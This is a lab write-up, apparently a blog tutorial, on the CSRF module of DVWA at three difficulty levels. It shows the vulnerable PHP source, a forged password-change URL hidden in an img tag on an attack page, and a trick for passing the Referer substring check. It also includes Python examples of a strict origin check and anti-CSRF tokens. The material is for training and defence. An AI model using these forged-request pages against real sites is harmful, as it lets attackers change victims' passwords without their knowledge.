DVWA: CSRF (Cross-Site Request Forgery), all levels

1. Vulnerability overview

CSRF (Cross-Site Request Forgery).

CSRF exploits the victim's still-valid authentication state (cookies, session information): the victim is tricked into clicking a malicious link or visiting a page that contains attack code, and, without the victim's knowledge, a request is sent to the server in the victim's name, completing an operation the victim never intended.

2. Tools

Burp Suite, Firefox

3. Test procedure

Level 1: Low

Source code:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

 

From the code we can see that once the server receives the password-change request via GET, it only compares the two parameters (password_new and password_conf); if they match, it carries out the password change.

Enter a new password and submit the change.

After clicking Change, the resulting link is:

http://<IP address>/dvwa/vulnerabilities/csrf/?password_new=<new password>&password_conf=<confirm password>&Change=Change#

So all we need to do is build a link of this form with the two parameter values changed.

Note that CSRF relies on the victim's cookie to send the forged request to the server. Cookies are not shared between different browsers, so the attack only succeeds if the victim opens the link in the same browser in which they are logged in.

PS: since this link is very direct and easy to spot, it can be hidden inside a web page.

For example:

<html>

    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>change</title>
    </head>
    <body>
    <img src="http://<IP address>/dvwa/vulnerabilities/csrf/?password_new=<new password>&password_conf=<confirm password>&Change=Change#"/>
    <p> success </p>
    </body>
</html>

 

 

Level 2: Medium

Source code:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

 

Compared with the Low level, one check has been added: if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )

HTTP_REFERER: the value of the Referer header in the HTTP request, i.e. the address the request came from.

SERVER_NAME: the Host header in the HTTP request, i.e. the host name being accessed.

When HTTP_REFERER is found to contain SERVER_NAME, the password change goes ahead. Because stripos is a case-insensitive substring search, the check passes whenever the server name appears anywhere in the Referer, not only when the request genuinely came from that host.

So we can capture the request with Burp Suite to obtain the parameters.

Then build an HTML page as in the Low level, rename the file to the target host's IP address, place it in the web root, and open it; the Referer now contains the server name and the attack succeeds.
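To make the difference concrete, here is the Medium-level Referer check rewritten in Python beside a hardened variant that compares the host component of the Origin/Referer header exactly instead of searching for a substring. This is an added illustration, not DVWA's code; the server name 192.168.1.10 and the sample request headers are constructed for the example.

```python
"""Referer-based CSRF checks: the DVWA Medium substring match versus a strict
host comparison. Added example, not DVWA's own code; SERVER_NAME and the
sample headers below are constructed values."""
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

SERVER_NAME = "192.168.1.10"  # assumed DVWA host, stands in for $_SERVER['SERVER_NAME']


def dvwa_medium_check(referer: Optional[str], server_name: str = SERVER_NAME) -> bool:
    """Python equivalent of
    stripos($_SERVER['HTTP_REFERER'], $_SERVER['SERVER_NAME']) !== false.
    Passes as soon as the server name occurs anywhere in the Referer string."""
    if referer is None:  # a missing Referer header makes stripos() return false
        return False
    return server_name.lower() in referer.lower()


def strict_origin_check(headers: Dict[str, str], server_name: str = SERVER_NAME) -> bool:
    """Hardened variant: prefer Origin, fall back to Referer, parse it as a URL
    and require the host component to equal the server name exactly.
    A request with neither header is rejected (fail closed)."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    if parts.scheme not in ("http", "https"):
        return False
    return (parts.hostname or "").lower() == server_name.lower()


# Constructed sample requests: the third and fourth mimic the renamed-file trick
# described above, where the server name appears in the path or a subdomain.
SAMPLE_REQUESTS = [
    ("legitimate form submit", {"Referer": "http://192.168.1.10/dvwa/vulnerabilities/csrf/"}),
    ("cross-site, plain", {"Referer": "http://other-site.test/csrf.html"}),
    ("cross-site, server name in file name", {"Referer": "http://other-site.test/192.168.1.10.html"}),
    ("cross-site, server name in subdomain", {"Referer": "http://192.168.1.10.other-site.test/"}),
    ("no Referer at all", {}),
]


def evaluate(requests=SAMPLE_REQUESTS) -> Dict[str, Tuple[bool, bool]]:
    """Return {description: (medium_check_passed, strict_check_passed)}."""
    return {
        name: (dvwa_medium_check(headers.get("Referer")), strict_origin_check(headers))
        for name, headers in requests
    }


if __name__ == "__main__":
    for name, (medium, strict) in evaluate().items():
        print(f"{name:40s} medium={medium!s:5s} strict={strict}")
```

Only the legitimate request passes the strict check; the two cross-site requests that merely contain the server name pass the substring check but fail the host comparison. Even the strict version is a defence in depth rather than a complete one, since browsers may omit the Referer entirely, which is why the High level moves to a token.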

 

 

Level 3: High

Source code:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

The High level adds an Anti-CSRF token mechanism. Every time the user performs a password change, the server returns a fresh random token; a request to the server must carry this token parameter, and the server checks the token before anything else, processing the client's request only if the token is correct. This mechanism rules out changing the password through the CSRF vulnerability alone; an attack would have to be combined with XSS.
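The token flow above, written out as an added Python illustration rather than DVWA's own checkToken()/generateSessionToken(): the server stores a random token in the session, embeds it in the form, compares it in constant time on every change request, and rotates it after each successful check. Session, user table and request parameters are plain dicts constructed for the example; the md5 storage is kept only to mirror the page's code.

```python
"""Per-session anti-CSRF token, modelled on the DVWA High level. Added example,
not DVWA's own code; the dicts used as session, user table and request are
constructed stand-ins."""
import hashlib
import hmac
import secrets
from typing import Dict, Optional


def generate_session_token(session: Dict[str, str]) -> str:
    """Counterpart of generateSessionToken(): store a fresh unpredictable token."""
    token = secrets.token_hex(16)  # 128 bits from the OS CSPRNG
    session["session_token"] = token
    return token


def check_token(user_token: Optional[str], session_token: Optional[str]) -> bool:
    """Counterpart of checkToken(): reject missing tokens, compare in constant time."""
    if not user_token or not session_token:
        return False
    return hmac.compare_digest(user_token, session_token)


def render_change_form(session: Dict[str, str]) -> str:
    """The page the server serves; the hidden user_token field is what a forged
    cross-site request cannot know, because it lives only in this user's HTML."""
    token = session.get("session_token") or generate_session_token(session)
    return (
        '<form method="post" action="/dvwa/vulnerabilities/csrf/">'
        f'<input type="hidden" name="user_token" value="{token}">'
        '<input type="password" name="password_new">'
        '<input type="password" name="password_conf">'
        '<input type="submit" name="Change" value="Change">'
        "</form>"
    )


def change_password(users: Dict[str, str], session: Dict[str, str], params: Dict[str, str]) -> str:
    """Handler mirroring the High-level flow; returns the message shown to the user."""
    if not check_token(params.get("user_token"), session.get("session_token")):
        return "CSRF token is incorrect"  # DVWA redirects to index.php here
    # One-time use: rotate the token once it has been consumed so a captured
    # request cannot simply be replayed.
    generate_session_token(session)
    new_pw = params.get("password_new", "")
    conf_pw = params.get("password_conf", "")
    if new_pw != conf_pw:
        return "Passwords did not match."
    # md5() only to mirror the page's schema; it is not a recommended password hash.
    users[session["user"]] = hashlib.md5(new_pw.encode()).hexdigest()
    return "Password Changed."


if __name__ == "__main__":
    users = {"admin": hashlib.md5(b"password").hexdigest()}  # constructed user table
    session = {"user": "admin"}
    render_change_form(session)
    # A forged cross-site request carries the cookie but not the token:
    print(change_password(users, session, {"password_new": "x", "password_conf": "x"}))
    # The real form submission carries the token embedded in the served page:
    good = {"user_token": session["session_token"], "password_new": "x", "password_conf": "x"}
    print(change_password(users, session, good))
    # Replaying the same request fails because the token was rotated:
    print(change_password(users, session, good))
```

The token only helps because a forged request from another origin cannot read the served page. A script already running in the DVWA origin can read the hidden field and submit it, which is exactly why the author notes that beating the High level needs XSS in combination; the token defends against cross-site forgery, not against same-origin script execution.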

Posted 2020-03-26 22:19 by 何包蛋